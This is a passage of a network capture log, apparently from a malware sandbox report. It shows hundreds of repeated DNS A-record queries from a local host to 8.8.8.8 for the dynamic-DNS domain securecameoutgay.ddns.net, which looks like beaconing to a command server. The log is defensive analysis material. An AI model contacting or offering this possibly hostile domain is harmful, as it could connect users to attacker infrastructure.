                                                    Oct 12, 2024 23:05:53.710469007 CEST192.168.2.148.8.8.80xcd5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.717998981 CEST192.168.2.148.8.8.80xcd5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.724997997 CEST192.168.2.148.8.8.80xcd5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.731828928 CEST192.168.2.148.8.8.80xcd5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.738893986 CEST192.168.2.148.8.8.80x8923Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.745459080 CEST192.168.2.148.8.8.80x8923Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.752290964 CEST192.168.2.148.8.8.80x8923Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.758944035 CEST192.168.2.148.8.8.80x8923Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.765546083 CEST192.168.2.148.8.8.80x8923Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.772449970 CEST192.168.2.148.8.8.80x7d20Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.779093027 CEST192.168.2.148.8.8.80x7d20Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.785707951 CEST192.168.2.148.8.8.80x7d20Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.792490005 CEST192.168.2.148.8.8.80x7d20Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.799122095 CEST192.168.2.148.8.8.80x7d20Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.806873083 CEST192.168.2.148.8.8.80x6bafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.814917088 CEST192.168.2.148.8.8.80x6bafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.822485924 CEST192.168.2.148.8.8.80x6bafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.829579115 CEST192.168.2.148.8.8.80x6bafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.836246967 CEST192.168.2.148.8.8.80x6bafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.842894077 CEST192.168.2.148.8.8.80x4623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.850157022 CEST192.168.2.148.8.8.80x4623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.857249975 CEST192.168.2.148.8.8.80x4623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.864131927 CEST192.168.2.148.8.8.80x4623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.870899916 CEST192.168.2.148.8.8.80x4623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.877841949 CEST192.168.2.148.8.8.80xbaedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.884682894 CEST192.168.2.148.8.8.80xbaedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.891237974 CEST192.168.2.148.8.8.80xbaedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.898261070 CEST192.168.2.148.8.8.80xbaedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.906085968 CEST192.168.2.148.8.8.80xbaedStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.914449930 CEST192.168.2.148.8.8.80x783cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.921241045 CEST192.168.2.148.8.8.80x783cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.929646969 CEST192.168.2.148.8.8.80x783cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.936455965 CEST192.168.2.148.8.8.80x783cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.943226099 CEST192.168.2.148.8.8.80x783cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.950105906 CEST192.168.2.148.8.8.80xe86dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.956834078 CEST192.168.2.148.8.8.80xe86dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.963709116 CEST192.168.2.148.8.8.80xe86dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.970143080 CEST192.168.2.148.8.8.80xe86dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.976710081 CEST192.168.2.148.8.8.80xe86dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.983746052 CEST192.168.2.148.8.8.80x1c47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.990730047 CEST192.168.2.148.8.8.80x1c47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.997621059 CEST192.168.2.148.8.8.80x1c47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.005790949 CEST192.168.2.148.8.8.80x1c47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.013223886 CEST192.168.2.148.8.8.80x1c47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.021070957 CEST192.168.2.148.8.8.80x6b96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.027749062 CEST192.168.2.148.8.8.80x6b96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.034337044 CEST192.168.2.148.8.8.80x6b96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.041110992 CEST192.168.2.148.8.8.80x6b96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.047846079 CEST192.168.2.148.8.8.80x6b96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.054963112 CEST192.168.2.148.8.8.80xdbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.061631918 CEST192.168.2.148.8.8.80xdbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.068849087 CEST192.168.2.148.8.8.80xdbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.076519966 CEST192.168.2.148.8.8.80xdbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.085170984 CEST192.168.2.148.8.8.80xdbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.092034101 CEST192.168.2.148.8.8.80x964eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.098717928 CEST192.168.2.148.8.8.80x964eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.106853962 CEST192.168.2.148.8.8.80x964eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.115442991 CEST192.168.2.148.8.8.80x964eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.123306036 CEST192.168.2.148.8.8.80x964eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.130204916 CEST192.168.2.148.8.8.80x89fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.136739969 CEST192.168.2.148.8.8.80x89fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.143652916 CEST192.168.2.148.8.8.80x89fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.150568008 CEST192.168.2.148.8.8.80x89fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.157206059 CEST192.168.2.148.8.8.80x89fdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.164148092 CEST192.168.2.148.8.8.80x6430Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.170953035 CEST192.168.2.148.8.8.80x6430Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.177648067 CEST192.168.2.148.8.8.80x6430Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.184474945 CEST192.168.2.148.8.8.80x6430Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.190964937 CEST192.168.2.148.8.8.80x6430Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.197768927 CEST192.168.2.148.8.8.80x927Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.205131054 CEST192.168.2.148.8.8.80x927Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.213139057 CEST192.168.2.148.8.8.80x927Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.219788074 CEST192.168.2.148.8.8.80x927Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.226344109 CEST192.168.2.148.8.8.80x927Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.233144045 CEST192.168.2.148.8.8.80x2b2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.239850998 CEST192.168.2.148.8.8.80x2b2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.246354103 CEST192.168.2.148.8.8.80x2b2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.253804922 CEST192.168.2.148.8.8.80x2b2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.260796070 CEST192.168.2.148.8.8.80x2b2dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.267376900 CEST192.168.2.148.8.8.80x904eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.273972034 CEST192.168.2.148.8.8.80x904eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.280306101 CEST192.168.2.148.8.8.80x904eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.287024975 CEST192.168.2.148.8.8.80x904eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.293685913 CEST192.168.2.148.8.8.80x904eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.300579071 CEST192.168.2.148.8.8.80xec85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.307212114 CEST192.168.2.148.8.8.80xec85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.313863039 CEST192.168.2.148.8.8.80xec85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.320605040 CEST192.168.2.148.8.8.80xec85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.327482939 CEST192.168.2.148.8.8.80xec85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.334543943 CEST192.168.2.148.8.8.80x83caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.341559887 CEST192.168.2.148.8.8.80x83caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.348490000 CEST192.168.2.148.8.8.80x83caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.354952097 CEST192.168.2.148.8.8.80x83caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.361835003 CEST192.168.2.148.8.8.80x83caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.368448019 CEST192.168.2.148.8.8.80xdf55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.374816895 CEST192.168.2.148.8.8.80xdf55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.382006884 CEST192.168.2.148.8.8.80xdf55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.389282942 CEST192.168.2.148.8.8.80xdf55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.396116018 CEST192.168.2.148.8.8.80xdf55Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.402741909 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.409089088 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.415920019 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.422823906 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.429326057 CEST192.168.2.148.8.8.80x8250Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.436000109 CEST192.168.2.148.8.8.80x2b02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.442718983 CEST192.168.2.148.8.8.80x2b02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.449350119 CEST192.168.2.148.8.8.80x2b02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.455815077 CEST192.168.2.148.8.8.80x2b02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.462738037 CEST192.168.2.148.8.8.80x2b02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.469587088 CEST192.168.2.148.8.8.80xb7faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.476836920 CEST192.168.2.148.8.8.80xb7faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.483619928 CEST192.168.2.148.8.8.80xb7faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.491596937 CEST192.168.2.148.8.8.80xb7faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.499634027 CEST192.168.2.148.8.8.80xb7faStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.506310940 CEST192.168.2.148.8.8.80x6cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.512996912 CEST192.168.2.148.8.8.80x6cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.519392014 CEST192.168.2.148.8.8.80x6cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.526572943 CEST192.168.2.148.8.8.80x6cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.533325911 CEST192.168.2.148.8.8.80x6cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.539975882 CEST192.168.2.148.8.8.80xd3f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.546962976 CEST192.168.2.148.8.8.80xd3f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.553908110 CEST192.168.2.148.8.8.80xd3f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.560585022 CEST192.168.2.148.8.8.80xd3f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.567389965 CEST192.168.2.148.8.8.80xd3f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.574700117 CEST192.168.2.148.8.8.80x3d01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.581604004 CEST192.168.2.148.8.8.80x3d01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.611706972 CEST192.168.2.148.8.8.80x3d01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.619019032 CEST192.168.2.148.8.8.80x3d01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.626298904 CEST192.168.2.148.8.8.80x3d01Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.633075953 CEST192.168.2.148.8.8.80xa9eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.640306950 CEST192.168.2.148.8.8.80xa9eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.647219896 CEST192.168.2.148.8.8.80xa9eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.653831005 CEST192.168.2.148.8.8.80xa9eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.660594940 CEST192.168.2.148.8.8.80xa9eaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.669594049 CEST192.168.2.148.8.8.80x3cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.676645041 CEST192.168.2.148.8.8.80x3cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.684372902 CEST192.168.2.148.8.8.80x3cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.690752029 CEST192.168.2.148.8.8.80x3cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.697391033 CEST192.168.2.148.8.8.80x3cc2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.704185009 CEST192.168.2.148.8.8.80x8a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.711232901 CEST192.168.2.148.8.8.80x8a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.717907906 CEST192.168.2.148.8.8.80x8a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.724653959 CEST192.168.2.148.8.8.80x8a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.731312990 CEST192.168.2.148.8.8.80x8a17Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.738138914 CEST192.168.2.148.8.8.80xbc78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.744827986 CEST192.168.2.148.8.8.80xbc78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.765523911 CEST192.168.2.148.8.8.80xbc78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.772365093 CEST192.168.2.148.8.8.80xbc78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.779082060 CEST192.168.2.148.8.8.80xbc78Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.791757107 CEST192.168.2.148.8.8.80x5f10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.798358917 CEST192.168.2.148.8.8.80x5f10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.805182934 CEST192.168.2.148.8.8.80x5f10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.811952114 CEST192.168.2.148.8.8.80x5f10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.818618059 CEST192.168.2.148.8.8.80x5f10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.825745106 CEST192.168.2.148.8.8.80xce19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:54.832555056 CEST192.168.2.148.8.8.80xce19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.076426029 CEST192.168.2.148.8.8.80xce19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.083127975 CEST192.168.2.148.8.8.80xce19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.089684963 CEST192.168.2.148.8.8.80xce19Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.096213102 CEST192.168.2.148.8.8.80x6a54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.102797031 CEST192.168.2.148.8.8.80x6a54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.109966040 CEST192.168.2.148.8.8.80x6a54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.116691113 CEST192.168.2.148.8.8.80x6a54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.123189926 CEST192.168.2.148.8.8.80x6a54Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.130014896 CEST192.168.2.148.8.8.80xdb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.136329889 CEST192.168.2.148.8.8.80xdb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.142993927 CEST192.168.2.148.8.8.80xdb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.149651051 CEST192.168.2.148.8.8.80xdb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.156110048 CEST192.168.2.148.8.8.80xdb5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.162592888 CEST192.168.2.148.8.8.80xaf9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.169291973 CEST192.168.2.148.8.8.80xaf9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.176124096 CEST192.168.2.148.8.8.80xaf9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.182780027 CEST192.168.2.148.8.8.80xaf9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.189522028 CEST192.168.2.148.8.8.80xaf9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.196050882 CEST192.168.2.148.8.8.80xd484Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.203054905 CEST192.168.2.148.8.8.80xd484Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.209652901 CEST192.168.2.148.8.8.80xd484Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.216193914 CEST192.168.2.148.8.8.80xd484Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.222837925 CEST192.168.2.148.8.8.80xd484Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.229558945 CEST192.168.2.148.8.8.80x248bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.236591101 CEST192.168.2.148.8.8.80x248bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.243062973 CEST192.168.2.148.8.8.80x248bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.249561071 CEST192.168.2.148.8.8.80x248bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.256303072 CEST192.168.2.148.8.8.80x248bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.263010025 CEST192.168.2.148.8.8.80xf7daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.269706964 CEST192.168.2.148.8.8.80xf7daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:55.276302099 CEST192.168.2.148.8.8.80xf7daStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
